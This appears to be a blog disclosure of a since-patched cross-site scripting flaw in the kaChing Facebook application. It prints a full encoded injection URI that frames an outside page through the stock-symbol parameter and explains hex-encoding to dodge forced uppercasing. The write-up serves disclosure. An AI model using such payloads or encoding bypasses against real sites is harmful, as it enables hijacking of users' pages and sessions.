FAXX Hack: kaChing

Facebook Verified Application

Current Monthly Active Users: 28,778

Current Rank on Application Leaderboard: 963

Application Developer: kaChing Group, Inc.

Responsiveness: I received an e-mail from kaChing saying the patch was fixed about six hours after notifying them.

Vulnerability Status: Patched

Capable of Clickjacking Install: Uncertain

Example URI: http://apps.facebook.com/kaching/portfolio/trade?symbol=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.kaching.com%2F%26%23×66%3B%26%23×62%3B%2F%26%23×70%3B%26%23x6F%3B%26%23×72%3B%26%23×74%3B%26%23×66%3B%26%23x6F%3B%26%23x6C%3B%26%23×69%3B%26%23x6F%3B%2F%26%23×74%3B%26%23×72%3B%26%23×61%3B%26%23×64%3B%26%23×65%3B%3F%26%23×73%3B%26%23×79%3B%26%23x6D%3B%26%23×62%3B%26%23x6F%3B%26%23x6C%3B%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E

Notes: This hole was very straightforward, but fully exploiting it required one more trick. Since the injected parameter was a stock symbol, the resulting page would automatically capitalize the input when displaying an error message. That meant that the injected URI became uppercase when it needed to be lowercase. To combat that issue, I converted the text parts of the URI to hex encodings, then had to encode those values for a URI. All these steps resulted in the rather lengthy URI above, which did preserve capitalization.

P.S. Those should be lowercase x’s in the example URI.